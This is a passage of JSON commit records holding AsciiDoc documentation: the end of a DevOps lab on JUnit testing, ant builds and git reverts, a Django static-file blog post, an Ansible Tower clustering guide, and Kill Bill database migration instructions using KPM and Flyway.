{\n\t\t this.a = new Class1(\"TestWebMessage\");\n\t}\n\n\t@After\n\tpublic void tearDown() throws Exception {\n\t}\n\n\t@Test\n\tpublic void testTrue() {\n assertTrue(\"assertTrue test\", true); \/\/ true is true\n assertNotNull(\"a is not null\", this.a); \/\/a exists\n assertEquals(\"five is 5\", \"five\", this.a.five()); \/\/a.five = \"five\"\n assertEquals(\"string correctly generated\", \"<h1>TestWebMessage<\/h1>\", this.a.webMessag\ne()); \/\/ string built correctly\n\t}\n\n}\n....\n\nEdit the Class1.java file:\n\n....\nvagrant@manos:\/home\/hijo$ nano src\/main\/java\/biz\/calavera\/Class1.java\n\n GNU nano 2.2.6 File: src\/main\/java\/biz\/calavera\/Class1.java\n\npackage biz.calavera;\n\n\npublic class Class1 {\n String strMsg;\n\n public Class1 (String inString)\n {\n strMsg = inString;\n }\n public String five()\n {\n return \"five\";\n }\n\n public String webMessage()\n {\n return \"<h1>\" + strMsg + \"<\/h1>\";\n }\n\n\n }\n....\n\n\nReplace\n\n return \"five\";\n\nwith\n\n return \"four\";\n\nRebuild with ant:\n\n....\nvagrant@manos:\/home\/hijo$ sudo ant\nBuildfile: \/home\/hijo\/build.xml\n\ninit:\n [echo]\n [echo] \t\t\tComputer name is ${my_env.COMPUTERNAME}\n [echo] User name is root\n [echo] \t\t\tBuilding from \/home\/hijo\/build.xml\n [echo] \t\t\tJava is version 1.7\n [echo] \t\t\tProject is ${ant.project.name}\n [echo] \t\t\tAnt is Apache Ant(TM) version 1.9.4 compiled on April 29 2014\n [echo] \t\t\tBasedir is \/home\/hijo\n [echo] \t\t\tSource is .\/src\/main\/java\/biz\/calavera\n [echo] \t\t\tBuild target is .\/target\n [echo] \t\t\tDeployment target is \/var\/lib\/tomcat6\/webapps\/ROOT\/WEB-INF\/lib\n [echo]\n\ncompile:\n [javac] Compiling 2 source files to \/home\/hijo\/target\n [javac] Compiling 1 source file to \/home\/hijo\/target\n\ntest:\n [echo]\n [echo] \t\t\tentering test\n [echo]\n [junit] Running biz.calavera.TestClass1\n [junit] Tests run: 1, Failures: 1, Errors: 0, Skipped: 0, Time elapsed: 0.074 sec\n\nBUILD FAILED\n\/home\/hijo\/build.xml:69: Test biz.calavera.TestClass1 failed\n\nTotal time: 1 second\n....\n\nWe got something quite different - a failed build.\n\n\nWe can see the results this way:\n\n....\nvagrant@manos:\/home\/hijo$ cat target\/result.txt\nTestsuite: biz.calavera.TestClass1\nTests run: 1, Failures: 1, Errors: 0, Skipped: 0, Time elapsed: 0.074 sec\n\nTestcase: testTrue took 0.012 sec\n\tFAILED\nfive is 5 expected:<f[ive]> but was:<f[our]>\njunit.framework.AssertionFailedError: five is 5 expected:<f[ive]> but was:<f[our]>\n\tat biz.calavera.TestClass1.testTrue(Unknown Source)\n....\n\nNotice we can still curl. The broken build was not deployed to the local Tomcat.\n\n....\nvagrant@manos:\/home\/hijo$ curl localhost:8080\/MainServlet\n<h1>YourStudentID This is a skeleton application-- to explore the end to end Calavera delivery framework.<\/h1>\n....\n\n\nWhy did this happen? Go back to the test harness and notice the line:\n\n assertEquals(\"five is 5\", \"five\", this.a.five()); \/\/a.five = \"five\"\n\nNOTE: The `\/\/` in the line above indicates a comment in the Java test.\n\nWhat this says is there is a method (a command or instruction) on TestClass1 called \"five,\" and in fact if it is called it should (unsurprisingly) return EXACTLY the string \"`five`\". No more, no less.\n\nIn terms of the JUnit test language, the test ASSERTS that the method `five` invoked on the object `this.a` (which was constructed out of Class1, as you can see at the start of the test class), will be EQUAL to \"five.\" We purposefully broke the test by telling the method to return \"four\".\n\nTest driven development is a critically important part of building applications and you are encouraged to deepen your familiarity with it. This is the simplest, most basic discussion imaginable.\n\nLet's abandon the changes that \"broke the build\":\n\n vagrant@manos:\/home\/hijo$ git reset --hard\n\nThis command discards all changes you have not committed.\n\nDo\n\n cat src\/main\/java\/biz\/calavera\/Class1.java\n\nand you will see \"four\" reverted to \"five.\"\n\nFinally, let's go back to the original version without YourStudentID in the message:\n\n....\nvagrant@manos:\/home\/hijo$ git log --pretty=short --abbrev-commit\ncommit 3b810e4\nAuthor: Charles Betz <char@calavera.biz>\n\n my local java\n\ncommit b45dc90\nAuthor: Charles Betz <char@calavera.biz>\n\n initial commit\n....\n\nNotice in the above the line:\n\n commit 3b810e4\n\nThe string `3b810e4` is the commit hash. https:\/\/git-scm.com\/book\/en\/v2\/Getting-Started-Git-Basics[More on Git hashing & other topics.]\n\nFind the git commit hash associated with your commit by running `git log --pretty=short --abbrev-commit` as in the example above. Then, run the revert command:\n\n....\nvagrant@manos:\/home\/hijo$ git revert <hash>\n....\n\nNOTE: You will need to edit the revert message in nano. Save and exit.\n\n....\n[master b66c1c9] Revert \"my local java\"\n 1 file changed, 1 insertion(+), 1 deletion(-)\n....\n\nSee that \"YourStudentID\" is now removed, as we have reverted to the original version of the code.\n\n....\nvagrant@manos:\/home\/hijo$ cat src\/main\/java\/biz\/calavera\/MainServlet.java\n....\n\nRebuild with ant and check that the original functionality is restored. Use Curl again.\n\nExit your VM and destroy it:\n\n vagrant@manos:exit\n YourStudentID@serverXXX:~\/Calavera$ vagrant destroy manos -f\n\n\nCongratulations, you have finished another lab. Next up: an end to end DevOps pipeline.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"67c2920d695bfb760b946498196631d9211207b3","subject":"Update 2015-08-27-Boosting-up-and-managing-static-files-with-Django.adoc","message":"Update 2015-08-27-Boosting-up-and-managing-static-files-with-Django.adoc","repos":"joao-bjsoftware\/joao-bjsoftware.github.io,joao-bjsoftware\/joao-bjsoftware.github.io,joao-bjsoftware\/joao-bjsoftware.github.io","old_file":"_posts\/2015-08-27-Boosting-up-and-managing-static-files-with-Django.adoc","new_file":"_posts\/2015-08-27-Boosting-up-and-managing-static-files-with-Django.adoc","new_contents":"= Boosting up and managing static files with Django\n:keywords: stati files, python, django, Jo\u00e3o Carvalho, Maestrus, YUI Compressor, bit brushing\n:attribute \"og:image\": image::boosting-static.png[Boosting up statis files with Django]\n\nimage::boosting-static.png[Boosting up and managing static files with Django]\n\n### Lights on fire!\n\nI have good news:\n\n*There a cacheable world outside and we can gain some speed improvement with it.* \n\nWith simple settings, you can do it with Django and NGINX Web server and minify static files, save bandwidth and reduce application network loading time;\n\n\n### What is to minify?\n\nTo minify static files is a process based on remove all unnecessary characters including trailing spaces, spaces between commands and source comments. By doing this, you will boost up your page load.\n\nThere a lot of software to minify files but the minification process will let static files hard to read and maintain. We don't want it, so to had a better approach in this two worlds you must use Django-pipeline application with some of those compression software.\n\nIn this article, I will talk only about Django-pipeline minification behavior with *YUI Compressor*.\n\n","old_contents":"= Boosting up and managing static files with Django\n:keywords: stati files, python, django, Jo\u00e3o Carvalho, Maestrus, YUI Compressor, bit brushing\n:attribute \"og:image\": image::boosting-static.png[Boosting up statis files with Django]\n\nimage::boosting-static.png[Boosting up and managing static files with Django]\n\nLights on fire!\n\nI have good news:\n\nThere a cacheable world outside and we can gain some speed improvement with it. \n\nWith simple settings, you can do it with Django and NGINX Web server and minify static files, save bandwidth and reduce application network loading time;","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"98927ded38e0bb03258bc1cb4fff0602e5983edf","subject":"Update 2017-03-15-Building-a-highly-available-Ansible-Tower-cluster.adoc","message":"Update 2017-03-15-Building-a-highly-available-Ansible-Tower-cluster.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-03-15-Building-a-highly-available-Ansible-Tower-cluster.adoc","new_file":"_posts\/2017-03-15-Building-a-highly-available-Ansible-Tower-cluster.adoc","new_contents":"= Building a highly available Ansible Tower cluster\n:published_at: 2017-03-15\n:hp-tags: ansible, ansible tower, ansible tower cluster\n\nWith the release of Ansible Tower 3.1 a short while back, it became possible to setup Ansible Tower in a highly available, active-active topology. You do this by setting up multiple Tower nodes that talk to a shared PostgreSQL database on a separate node. This database can be setup and managed by the Tower installation playbook, or you can manage it yourself.\n\nEach of the Tower nodes will serve up the web front end, so your users can choose which Tower server they use to log into. If you change the configuration through the web UI on one node, the change is visible over all instances through the shared database. For example, uploading a Tower license file to one of the Tower instances will make it show up in all of your Tower cluster nodes.\n\nCluster nodes keep in touch with one another for job scheduling and such through RabbitMQ.\n\nSounds good? That's because it is! And it gets better: setting up a Tower cluster is insanely easy!\n\nAs an example, I have set up a Tower cluster on three nodes: tower01.nontoonyt.lan, tower02.nontoonyt.lan and tower03.nontoonyt.lan. The database will reside on towerdb.nontoonyt.lan. By configuring the inventory in a specific - and quite simple - way, the Tower installation playbooks will build the whole cluster for me. \n\nimage::https:\/\/raw.githubusercontent.com\/wzzrd\/hubpress.io\/gh-pages\/images\/ansible-tower-cluster.png[Tower Cluster Topology, 460, 650,]\n\nThe below snippet is an edited version of the special inventory file we ship in the ansible-tower-setup tarball, called \"inventory_cluster\". \n\n....\n[tower]\ntower01.nontoonyt.lan\ntower02.nontoonyt.lan\ntower03.nontoonyt.lan\n\n[database]\ntowerdb.nontoonyt.lan\n\n[all:vars]\nadmin_password='myPassw0rd'\n\npg_host='towerdb.nontoonyt.lan'\npg_port='5432'\n\npg_database='tower'\npg_username='tower'\npg_password='myPassw0rd'\n\nrabbitmq_port=5672\nrabbitmq_vhost=tower\nrabbitmq_username=tower\nrabbitmq_password='myPassw0rd'\nrabbitmq_cookie=omnomnomnom\n\n# Needs to be true for fqdns and ip addresses\nrabbitmq_use_long_name=true\n....\n\n\nTo invoke setup.sh to perform a cluster installation based on that inventory file, you just run:\n\n....\n# .\/setup.sh -i inventory_cluster\n....\n\nThat's it. Hope you enjoy the new Ansible Tower cluster feature! Take a look at the Youtube screencast that goes with this blog.\n\nvideo::t3VdUjjuv70[youtube]\n\n\n\n\n","old_contents":"= Building a highly available Ansible Tower cluster\n:published_at: 2017-03-15\n:hp-tags: ansible, ansible tower, ansible tower cluster\n\nWith the release of Ansible Tower 3.1 a short while back, it became possible to setup Ansible Tower in a highly available, active-active topology. You do this by setting up multiple Tower nodes that talk to a shared PostgreSQL database on a separate node. This database can be setup and managed by the Tower installation playbook, or you can manage it yourself.\n\nEach of the Tower nodes will serve up the web front end, so your users can choose which Tower server they use to log into. If you change the configuration through the web UI on one node, the change is visible over all instances through the shared database. For example, uploading a Tower license file to one of the Tower instances will make it show up in all of your Tower cluster nodes.\n\nCluster nodes keep in touch with one another for job scheduling and such through RabbitMQ.\n\nSounds good? That's because it is! And it gets better: setting up a Tower cluster is insanely easy!\n\nAs an example, I have set up a Tower cluster on three nodes: tower01.nontoonyt.lan, tower02.nontoonyt.lan and tower03.nontoonyt.lan. The database will reside on towerdb.nontoonyt.lan. By configuring the inventory in a specific - and quite simple - way, the Tower installation playbooks will build the whole cluster for me. \n\nimage:\n\n\nThe below snippet is an edited version of the special inventory file we ship in the ansible-tower-setup tarball, called \"inventory_cluster\". \n\n....\n[tower]\ntower01.nontoonyt.lan\ntower02.nontoonyt.lan\ntower03.nontoonyt.lan\n\n[database]\ntowerdb.nontoonyt.lan\n\n[all:vars]\nadmin_password='myPassw0rd'\n\npg_host='towerdb.nontoonyt.lan'\npg_port='5432'\n\npg_database='tower'\npg_username='tower'\npg_password='myPassw0rd'\n\nrabbitmq_port=5672\nrabbitmq_vhost=tower\nrabbitmq_username=tower\nrabbitmq_password='myPassw0rd'\nrabbitmq_cookie=omnomnomnom\n\n# Needs to be true for fqdns and ip addresses\nrabbitmq_use_long_name=true\n....\n\n\nTo invoke setup.sh to perform a cluster installation based on that inventory file, you just run:\n\n....\n# .\/setup.sh -i inventory_cluster\n....\n\nThat's it. Hope you enjoy the new Ansible Tower cluster feature! Take a look at the Youtube screencast that goes with this blog.\n\nvideo::t3VdUjjuv70[youtube]\n\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"cee8671c98132636705016c0232926564b05924f","subject":"Update database_migrations.adoc","message":"Update database_migrations.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/database_migrations.adoc","new_file":"userguide\/tutorials\/database_migrations.adoc","new_contents":"= Kill Bill Database Migrations\n\n== Overview\n\nA typical Kill Bill deployment is comprised of several components: The core Kill Bill webapp and some plugins. Migrating the software to a higher version may require to migrate one, a few or all the different components and so potentially upgrading the database schema associated with one, a few or all of those components. The compatibility version between core Kill Bill and its plugins depends on the version of the https:\/\/github.com\/killbill\/killbill-plugin-api[plugin api] exported by a given Kill Bill version. The https:\/\/github.com\/killbill\/killbill-cloud\/tree\/master\/kpm[KPM] tool allows to list compatible plugins associated with a given Kill Bill version:\n\n[source,bash]\n----\nkpm info --version <killbill_version>\n----\n\nKill Bill and individual plugins assume specific tables, functions, etc. are installed in your database. The source of truth for the schema (DDL) files are:\n\n* In individual modules for Kill Bill, under `\\*\/src\/main\/resources\/org\/killbill\/billing\/*\/ddl.sql` (for example https:\/\/github.com\/killbill\/killbill\/tree\/master\/account\/src\/main\/resources\/org\/killbill\/billing\/account\/ddl.sql[account\/src\/main\/resources\/org\/killbill\/billing\/account\/ddl.sql]).\n* Under `src\/main\/resources\/ddl.sql` for Java plugins (https:\/\/github.com\/killbill\/killbill-adyen-plugin\/tree\/master\/src\/main\/resources\/ddl.sql[Adyen example]).\n* Under `db\/ddl.sql` for Ruby plugins (https:\/\/github.com\/killbill\/killbill-cybersource-plugin\/tree\/master\/db\/ddl.sql[CyberSource example]).\n\nThese files always contain the latest version, matching the latest code in that specific branch\/tag.\n\nTo access a specific version:\n\n* For Kill Bill itself, we publish a full DDL file per major version (http:\/\/docs.killbill.io\/0.22\/ddl.sql[0.22 example]). The DDL for the latest stable version of Kill Bill is at http:\/\/docs.killbill.io\/latest\/ddl.sql[http:\/\/docs.killbill.io\/latest\/ddl.sql].\n* For individual plugins, you can get the DDL file of a given version on GitHub by looking-up the specific tag (for v4.0.2 of the CyberSource plugin, it would be at https:\/\/github.com\/killbill\/killbill-cybersource-plugin\/tree\/v4.0.2\/db\/ddl.sql).\n\n== Migrations with Docker images\n\nThe `Migrations tooling` section below goes into details on how migrations are handled for individual components, and the tooling available to you to update your database schema when upgrading Kill Bill.\n\nIf you are using our standard Docker images, the procedure is simplified and as follows:\n\n1. Update the `\/var\/lib\/killbill\/kpm.yml` file in one of your containers to reflect the new version of Kill Bill you want to upgrade to.\n2. Run `$MIGRATIONS_CMD`. This will:\n ** Configure the database for migrations if needed (i.e. create the `schema_version` table(s), see below)\n ** Fetch all migrations needed to upgrade to the Kill Bill version specified in the `kpm.yml`\n ** Display the SQL that would be run (for Kill Bill and each plugin) and prompt the user whether it should be applied\n\nDepending on your dataset size, you may or may not want the script to apply these directly (e.g. you may prefer to use an online-schema-change tool for production), in which case you can simply grab the SQL output instead.\n\nCaveats:\n\n* This is only supported since `killbill\/killbill:0.20.10`\n* Ruby migrations aren't supported (if you have any, see the manual steps below)\n\n== Migrations tooling\n\nIn order to ease the database migrations, we decided to rely on standard tools for migrating from one given version to a higher version:\n\n* For Java componenents (Kill Bill itself, java plugins), we rely on https:\/\/flywaydb.org\/[Flyway]\n* For Ruby components (ruby plugins, KAUI, ...), we rely on http:\/\/edgeguides.rubyonrails.org\/active_record_migrations.html[Active Record migrations]\n\nIn addition to these standard tools, we also enhanced our existing tooling to support the following use cases:\n\n* Ability to download all the migration files associated with a migration from version `N` to `M` (see section `KPM` below)\n* Ability to output SQL (migration files) for production systems (see section `SQL output` below)\n\n=== KPM\n\nWe extended (https:\/\/github.com\/killbill\/killbill-cloud\/tree\/master\/kpm[KPM] with a new `migrations` verb to be able to **download migration files** that should be applied when migrating from one version to the next.\n\nUsage:\n\n[source,bash]\n----\nkpm migrations github_repository from_tag to_tag\n----\n\nFor example, to download all migration files for Kill Bill between 0.16.12 and 0.18.0:\n\n```\nkpm migrations killbill killbill-0.16.12 killbill-0.18.0\n```\n\nSimilar examples for Java and Ruby plugins:\n\n[source,bash]\n----\nkpm migrations killbill-analytics-plugin analytics-plugin-3.0.0 analytics-plugin-3.0.1\nkpm migrations killbill-cybersource-plugin v4.0.1 v4.0.2\n----\n\nBecause the implementation relies on the https:\/\/developer.github.com\/[GitHub API], unauthenticated requests are subject to https:\/\/developer.github.com\/v3\/#rate-limiting[rate limiting]. To work around it, go to https:\/\/github.com\/settings\/tokens to generate a token (default public, read-only, permissions will work) and specify it to KPM:\n\n[source,bash]\n----\nkpm migrations killbill killbill-0.16.3 killbill-0.16.4 --token=TOKEN\n----\n\n=== SQL output\n\nIn production environments, database access is often restricted and developers don't necessarily have rights to execute DDL commands (i.e. `CREATE`, `ALTER`, `DROP`, etc. statements). To get around this, we provide scripts to get access to the SQL that needs to be run for the migrations, including the `INSERT` statements to update the metadata table(s).\n\n==== Java\n\nFor Java code (Kill Bill and Java plugins), we publish a `killbill-flyway.jar` binary which is a wrapper around the `flyway` utility and exposes a `dryRunMigrate` command. Simply run it against your production database (read-only credentials are sufficient) to get the raw SQL.\n\nUsage example:\n\n[source,bash]\n----\n# \/var\/folders\/tmp\/migrations is the directory where the migration files were downoaded (using kpm migrate)\njava -jar killbill-flyway.jar -locations=filesystem:\/var\/folders\/tmp\/migrations -url='jdbc:mysql:\/\/DATABASE_IP:DATABASE_PORT\/DATABASE_NAME' -user=<USERNAME> -password=<PASSWORD> dryRunMigrate\n----\n\n==== Ruby\n\nFor Ruby code, we provide a `killbill-migration` script with the `killbill` gem (JRuby is recommended, see our http:\/\/docs.killbill.io\/latest\/payment_plugin.html#_building_ruby_plugins[installation instructions]).\n\nBesides outputting the SQL, it can also run the migrations.\n\nUsage examples:\n\n[source,bash]\n----\nkillbill-migration current_version cybersource\nkillbill-migration sql_for_migration cybersource --path=XXX\nkillbill-migration migrate cybersource --path=XXX\nkillbill-migration ruby_dump cybersource\nkillbill-migration sql_dump cybersource\n----\n\nOptions `--username`, `--password`, `--database` and `--host` are supported.\n\nIf you are a plugin developer, these commands are also available as part of the default Rake tasks of the plugin itself, for example:\n\n[source,bash]\n----\nPLUGIN_NAME=paypal_express USERNAME=root PASSWORD=root DB=killbill rake killbill:db:sql_for_migration\nPLUGIN_NAME=paypal_express USERNAME=root PASSWORD=root DB=killbill rake killbill:db:migrate\n----\n\nNote that the `PLUGIN_NAME` variable needs to match the prefix of the `schema_migrations` table.\n\n\n=== Kill Bill\n\nStarting with Kill Bill 0.16.4, SQL migrations files for Flyway are provided. They can be found on a per-module basis under `\\*\/src\/main\/resources\/org\/killbill\/billing\/*\/migration\/`. The versioning is based on the creation timestamp (i.e. `date +'%Y%m%d%H%M%S'`) and must be unique for each file so as to indicate the ordering (what Flyway calls the `version_rank`).\n\n==== Baseline\n\nFor Flyway migrations to work correctly, there is an initial https:\/\/flywaydb.org\/documentation\/command\/baseline[baseline] operation that needs to happens so as to create the metadata table, called `schema_version`. In the scenario where a developer can run its own migrations, the following command would be run:\n\n[source,bash]\n----\nflyway -url='jdbc:mysql:\/\/DATABASE_IP:DATABASE_PORT\/DATABASE_NAME' -user=<USERNAME> -password=<PASSWORD> baseline\n----\n\nIn the production scenario, the `schema_version` along with the initial version would have to be created manually:\n\n[source,sql]\n----\nCREATE TABLE `schema_version` (\n `installed_rank` int(11) NOT NULL,\n `version` varchar(50) DEFAULT NULL,\n `description` varchar(200) NOT NULL,\n `type` varchar(20) NOT NULL,\n `script` varchar(1000) NOT NULL,\n `checksum` int(11) DEFAULT NULL,\n `installed_by` varchar(100) NOT NULL,\n `installed_on` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,\n `execution_time` int(11) NOT NULL,\n `success` tinyint(1) NOT NULL,\n PRIMARY KEY (`installed_rank`),\n KEY `schema_version_s_idx` (`success`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\ninsert into schema_version (installed_rank, version, description, type, script, installed_by, installed_on, execution_time, success) VALUES (1, 1, '<< Flyway Baseline >>', 'BASELINE', '<< Flyway Baseline >>', 'admin', NOW(), 0, 1);\n----\n\n==== Migration from version `N` to `M`\n\nA typical migration from version `N` to `M` will require to first identify the set of migrations files that should be applied and then either apply them using Flyway commands or manually (production use case).\n\n\n[source,bash]\n----\n# Will download migration files in a temporary folder (e.g \/var\/folders\/XXX)\nkpm migrations killbill killbill-N killbill-M --token='GITHUB_TOKEN'\n\n# If using flyway is an option\nflyway -url='jdbc:mysql:\/\/DATABASE_IP:DATABASE_PORT\/DATABASE_NAME' -user=<USERNAME> -password=<PASSWORD> -locations=filesystem:\/var\/folders\/XXX migrate\n\n----\n\n=== Java plugins\n\nJava plugins migrations also rely on https:\/\/flywaydb.org\/[Flyway] and follow a similar workflow than Kill Bill itself. They can be found in each plugin under `src\/main\/resources\/migration\/`.\n\nThe metadata table should be called `<plugin_name>_schema_version`. Make sure to specify `-table=<plugin_name>_schema_version` when invoking Flyway.\n\n=== Ruby plugins\n\nRuby plugins migrations rely on http:\/\/edgeguides.rubyonrails.org\/active_record_migrations.html[Active Record migrations]. Migrations are located under `db\/migrate\/`. You can use the `killbill-migration` tool (see above) to run the migrations.\n\nThe metadata table should be called `<plugin_name>_schema_migrations`, e.g.:\n\n[source,sql]\n----\nCREATE TABLE `cybersource_schema_migrations` (\n `version` varchar(255) NOT NULL\n) ENGINE=InnoDB DEFAULT CHARSET=utf8\n----\n\nNote: adapt the DDL for your RDBMS engine.\n","old_contents":"= Kill Bill Database Migrations\n\n== Overview\n\nA typical Kill Bill deployment is comprised of several components: The core Kill Bill webapp and some plugins. Migrating the software to a higher version may require to migrate one, a few or all the different components and so potentially upgrading the database schema associated with one, a few or all of those components. The compatibility version between core Kill Bill and its plugins depends on the version of the https:\/\/github.com\/killbill\/killbill-plugin-api[plugin api] exported by a given Kill Bill version. The https:\/\/github.com\/killbill\/killbill-cloud\/tree\/master\/kpm[KPM] tool allows to list compatible plugins associated with a given Kill Bill version:\n\n[source,bash]\n----\nkpm info --version <killbill_version>\n----\n\nKill Bill and individual plugins assume specific tables, functions, etc. are installed in your database. The source of truth for the schema (DDL) files are:\n\n* In individual modules for Kill Bill, under `\\*\/src\/main\/resources\/org\/killbill\/billing\/*\/ddl.sql` (for example https:\/\/github.com\/killbill\/killbill\/tree\/master\/account\/src\/main\/resources\/org\/killbill\/billing\/account\/ddl.sql[account\/src\/main\/resources\/org\/killbill\/billing\/account\/ddl.sql]).\n* Under `src\/main\/resources\/ddl.sql` for Java plugins (https:\/\/github.com\/killbill\/killbill-adyen-plugin\/tree\/master\/src\/main\/resources\/ddl.sql[Adyen example]).\n* Under `db\/ddl.sql` for Ruby plugins (https:\/\/github.com\/killbill\/killbill-cybersource-plugin\/tree\/master\/db\/ddl.sql[CyberSource example]).\n\nThese files always contain the latest version, matching the latest code in that specific branch\/tag.\n\nTo access a specific version:\n\n* For Kill Bill itself, we publish a full DDL file per major version, available at http:\/\/docs.killbill.io\/<VERSION>\/ddl.sql (http:\/\/docs.killbill.io\/0.22\/ddl.sql[0.22 example]). The DDL for the latest stable version of Kill Bill is at http:\/\/docs.killbill.io\/latest\/ddl.sql[http:\/\/docs.killbill.io\/latest\/ddl.sql].\n* For individual plugins, you can get the DDL file of a given version on GitHub by looking-up the specific tag (for v4.0.2 of the CyberSource plugin, it would be at https:\/\/github.com\/killbill\/killbill-cybersource-plugin\/tree\/v4.0.2\/db\/ddl.sql).\n\n== Migrations with Docker images\n\nThe `Migrations tooling` section below goes into details on how migrations are handled for individual components, and the tooling available to you to update your database schema when upgrading Kill Bill.\n\nIf you are using our standard Docker images, the procedure is simplified and as follows:\n\n1. Update the `\/var\/lib\/killbill\/kpm.yml` file in one of your containers to reflect the new version of Kill Bill you want to upgrade to.\n2. Run `$MIGRATIONS_CMD`. This will:\n ** Configure the database for migrations if needed (i.e. create the `schema_version` table(s), see below)\n ** Fetch all migrations needed to upgrade to the Kill Bill version specified in the `kpm.yml`\n ** Display the SQL that would be run (for Kill Bill and each plugin) and prompt the user whether it should be applied\n\nDepending on your dataset size, you may or may not want the script to apply these directly (e.g. you may prefer to use an online-schema-change tool for production), in which case you can simply grab the SQL output instead.\n\nCaveats:\n\n* This is only supported since `killbill\/killbill:0.20.10`\n* Ruby migrations aren't supported (if you have any, see the manual steps below)\n\n== Migrations tooling\n\nIn order to ease the database migrations, we decided to rely on standard tools for migrating from one given version to a higher version:\n\n* For Java componenents (Kill Bill itself, java plugins), we rely on https:\/\/flywaydb.org\/[Flyway]\n* For Ruby components (ruby plugins, KAUI, ...), we rely on http:\/\/edgeguides.rubyonrails.org\/active_record_migrations.html[Active Record migrations]\n\nIn addition to these standard tools, we also enhanced our existing tooling to support the following use cases:\n\n* Ability to download all the migration files associated with a migration from version `N` to `M` (see section `KPM` below)\n* Ability to output SQL (migration files) for production systems (see section `SQL output` below)\n\n=== KPM\n\nWe extended (https:\/\/github.com\/killbill\/killbill-cloud\/tree\/master\/kpm[KPM] with a new `migrations` verb to be able to **download migration files** that should be applied when migrating from one version to the next.\n\nUsage:\n\n[source,bash]\n----\nkpm migrations github_repository from_tag to_tag\n----\n\nFor example, to download all migration files for Kill Bill between 0.16.12 and 0.18.0:\n\n```\nkpm migrations killbill killbill-0.16.12 killbill-0.18.0\n```\n\nSimilar examples for Java and Ruby plugins:\n\n[source,bash]\n----\nkpm migrations killbill-analytics-plugin analytics-plugin-3.0.0 analytics-plugin-3.0.1\nkpm migrations killbill-cybersource-plugin v4.0.1 v4.0.2\n----\n\nBecause the implementation relies on the https:\/\/developer.github.com\/[GitHub API], unauthenticated requests are subject to https:\/\/developer.github.com\/v3\/#rate-limiting[rate limiting]. To work around it, go to https:\/\/github.com\/settings\/tokens to generate a token (default public, read-only, permissions will work) and specify it to KPM:\n\n[source,bash]\n----\nkpm migrations killbill killbill-0.16.3 killbill-0.16.4 --token=TOKEN\n----\n\n=== SQL output\n\nIn production environments, database access is often restricted and developers don't necessarily have rights to execute DDL commands (i.e. `CREATE`, `ALTER`, `DROP`, etc. statements). To get around this, we provide scripts to get access to the SQL that needs to be run for the migrations, including the `INSERT` statements to update the metadata table(s).\n\n==== Java\n\nFor Java code (Kill Bill and Java plugins), we publish a `killbill-flyway.jar` binary which is a wrapper around the `flyway` utility and exposes a `dryRunMigrate` command. Simply run it against your production database (read-only credentials are sufficient) to get the raw SQL.\n\nUsage example:\n\n[source,bash]\n----\n# \/var\/folders\/tmp\/migrations is the directory where the migration files were downoaded (using kpm migrate)\njava -jar killbill-flyway.jar -locations=filesystem:\/var\/folders\/tmp\/migrations -url='jdbc:mysql:\/\/DATABASE_IP:DATABASE_PORT\/DATABASE_NAME' -user=<USERNAME> -password=<PASSWORD> dryRunMigrate\n----\n\n==== Ruby\n\nFor Ruby code, we provide a `killbill-migration` script with the `killbill` gem (JRuby is recommended, see our http:\/\/docs.killbill.io\/latest\/payment_plugin.html#_building_ruby_plugins[installation instructions]).\n\nBesides outputting the SQL, it can also run the migrations.\n\nUsage examples:\n\n[source,bash]\n----\nkillbill-migration current_version cybersource\nkillbill-migration sql_for_migration cybersource --path=XXX\nkillbill-migration migrate cybersource --path=XXX\nkillbill-migration ruby_dump cybersource\nkillbill-migration sql_dump cybersource\n----\n\nOptions `--username`, `--password`, `--database` and `--host` are supported.\n\nIf you are a plugin developer, these commands are also available as part of the default Rake tasks of the plugin itself, for example:\n\n[source,bash]\n----\nPLUGIN_NAME=paypal_express USERNAME=root PASSWORD=root DB=killbill rake killbill:db:sql_for_migration\nPLUGIN_NAME=paypal_express USERNAME=root PASSWORD=root DB=killbill rake killbill:db:migrate\n----\n\nNote that the `PLUGIN_NAME` variable needs to match the prefix of the `schema_migrations` table.\n\n\n=== Kill Bill\n\nStarting with Kill Bill 0.16.4, SQL migrations files for Flyway are provided. They can be found on a per-module basis under `\\*\/src\/main\/resources\/org\/killbill\/billing\/*\/migration\/`. The versioning is based on the creation timestamp (i.e. `date +'%Y%m%d%H%M%S'`) and must be unique for each file so as to indicate the ordering (what Flyway calls the `version_rank`).\n\n==== Baseline\n\nFor Flyway migrations to work correctly, there is an initial https:\/\/flywaydb.org\/documentation\/command\/baseline[baseline] operation that needs to happens so as to create the metadata table, called `schema_version`. In the scenario where a developer can run its own migrations, the following command would be run:\n\n[source,bash]\n----\nflyway -url='jdbc:mysql:\/\/DATABASE_IP:DATABASE_PORT\/DATABASE_NAME' -user=<USERNAME> -password=<PASSWORD> baseline\n----\n\nIn the production scenario, the `schema_version` along with the initial version would have to be created manually:\n\n[source,sql]\n----\nCREATE TABLE `schema_version` (\n `installed_rank` int(11) NOT NULL,\n `version` varchar(50) DEFAULT NULL,\n `description` varchar(200) NOT NULL,\n `type` varchar(20) NOT NULL,\n `script` varchar(1000) NOT NULL,\n `checksum` int(11) DEFAULT NULL,\n `installed_by` varchar(100) NOT NULL,\n `installed_on` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,\n `execution_time` int(11) NOT NULL,\n `success` tinyint(1) NOT NULL,\n PRIMARY KEY (`installed_rank`),\n KEY `schema_version_s_idx` (`success`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\ninsert into schema_version (installed_rank, version, description, type, script, installed_by, installed_on, execution_time, success) VALUES (1, 1, '<< Flyway Baseline >>', 'BASELINE', '<< Flyway Baseline >>', 'admin', NOW(), 0, 1);\n----\n\n==== Migration from version `N` to `M`\n\nA typical migration from version `N` to `M` will require to first identify the set of migrations files that should be applied and then either apply them using Flyway commands or manually (production use case).\n\n\n[source,bash]\n----\n# Will download migration files in a temporary folder (e.g \/var\/folders\/XXX)\nkpm migrations killbill killbill-N killbill-M --token='GITHUB_TOKEN'\n\n# If using flyway is an option\nflyway -url='jdbc:mysql:\/\/DATABASE_IP:DATABASE_PORT\/DATABASE_NAME' -user=<USERNAME> 